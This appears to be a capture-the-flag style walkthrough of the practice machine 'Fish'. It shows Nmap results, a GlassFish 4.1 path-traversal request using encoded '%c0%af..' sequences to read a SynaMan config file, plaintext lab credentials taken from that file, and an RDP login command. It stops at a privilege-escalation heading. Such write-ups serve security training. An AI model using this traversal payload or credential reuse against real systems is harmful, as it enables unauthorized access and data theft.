Logo
Overview

PG: Fish | Walkthrough

October 29, 2021
2 min read
PG/Machines Boot2Root OSCP/Prep writeups LFI CVE/TotalAV
TL;DR
  • Credential Disclosure through LFI
  • Previlege Escalation through vulnerable installation of TotalAV

Enumeration

Nmap

Terminal window
PORT     STATE SERVICE              VERSION
3389/tcp open  ms-wbt-server        Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: FISHYYY
|   NetBIOS_Domain_Name: FISHYYY
|   NetBIOS_Computer_Name: FISHYYY
|   DNS_Domain_Name: Fishyyy
|   DNS_Computer_Name: Fishyyy
|   Product_Version: 10.0.19041
|_  System_Time: 2021-10-29T14:19:40+00:00
|_ssl-date: 2021-10-29T14:19:58+00:00; -27d15h33m01s from scanner time.
| ssl-cert: Subject: commonName=Fishyyy
| Not valid before: 2021-10-27T11:48:08
|_Not valid after:  2022-04-28T11:48:08
3700/tcp open  giop                 CORBA naming service
3820/tcp open  ssl/giop             CORBA naming service
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2014-08-21T13:30:10
|_Not valid after:  2024-08-18T13:30:10
|_ssl-date: TLS randomness does not represent time
3920/tcp open  ssl/exasoftport1?
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2014-08-21T13:30:10
|_Not valid after:  2024-08-18T13:30:10
|_ssl-date: TLS randomness does not represent time
4848/tcp open  http                 Sun GlassFish Open Source Edition  4.1
|_http-title: Login
6060/tcp open  http                 Synametrics Web Server 7 (Syncrify)
|_http-server-header: Synametrics Web Server v7
|_http-title: Site doesn't have a title (text/html).
7676/tcp open  java-message-service Java Message Service 301
8080/tcp open  http                 Sun GlassFish Open Source Edition  4.1
|_http-title: Data Web
| http-methods:
|_  Potentially risky methods: PUT DELETE TRACE
8181/tcp open  ssl/http             Sun GlassFish Open Source Edition  4.1
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_  Potentially risky methods: PUT DELETE TRACE
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2014-08-21T13:30:10
|_Not valid after:  2024-08-18T13:30:10
|_http-title: Data Web
8686/tcp  open  java-rmi Java RMI
| rmi-dumpregistry:
|   Fishyyy/7676/jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @169.254.10.3:49712
|     extends
|       java.rmi.server.RemoteStub
|       extends
|         java.rmi.server.RemoteObject
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @169.254.10.3:8686
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:
|_clock-skew: mean: -27d15h33m01s, deviation: 0s, median: -27d15h33m01s


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.37 seconds

Port 6060: SynaMan - v4.0: Credential Disclosure | exploit-db

Port 4848: GlassFish Server 4.1: LFI | exploit-db

Exploitation

Initial Access

Credential Disclosure through LFI

http://192.168.193.168:4848//theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afsynaman/config/AppConfig.xml


<Configuration>
<parameters>
<parameter name="adminEmail" type="1" value="admin@fish.pg"/>
<parameter name="smtpSecurity" type="1" value="None"/>
<parameter name="jvmPath" type="1" value="jre/bin/java"/>
<parameter name="userHomeRoot" type="1" value="C:\ProgramData\SynaManHome"/>
<parameter name="httpPortSSL" type="2" value="-1"/>
<parameter name="vmParams" type="1" value="-Xmx128m -DLoggingConfigFile=logconfig.xml"/>
<parameter name="httpPort" type="2" value="0"/>
<parameter name="synametricsUrl" type="1" value="http://synametrics.com/SynametricsWebApp/"/>
<parameter name="lastSelectedTab" type="1" value="1"/>
<parameter name="emailServerWebServicePort" type="2" value=""/>
<parameter name="imagePath" type="1" value="images/"/>
<parameter name="publicIPForUrl" type="1" value=""/>
<parameter name="defaultOperation" type="1" value="frontPage"/>
<parameter name="httpPort2" type="2" value="6060"/>
<parameter name="useUPnP" type="4" value="true"/>
<parameter name="smtpServer" type="1" value="mail.fish.pg"/>
<parameter name="smtpUser" type="1" value="arthur"/>
<parameter name="InitialSetupComplete" type="4" value="true"/>
<parameter name="failureOverHttpPort" type="2" value="55222"/>
<parameter name="disableCsrfPrevention" type="4" value="true"/>
<parameter name="httpIP" type="1" value=""/>
<parameter name="smtpPort" type="2" value="25"/>
<parameter name="emailServerWebServiceHost" type="1" value=""/>
<parameter name="smtpPassword" type="1" value="KingOfAtlantis"/>
<parameter name="ntServiceCommand" type="1" value="net start SynaMan"/>
<parameter name="mimicHtmlFiles" type="4" value="false"/>
</parameters>
</Configuration>

RDP into the target machine using the credential arthur:KingOfAtlantis

Terminal window
$ rdesktop -u arthur -p "KingOfAtlantis" $ip -g 90%

Privilege Escalation

TotalAV Privilege Escalation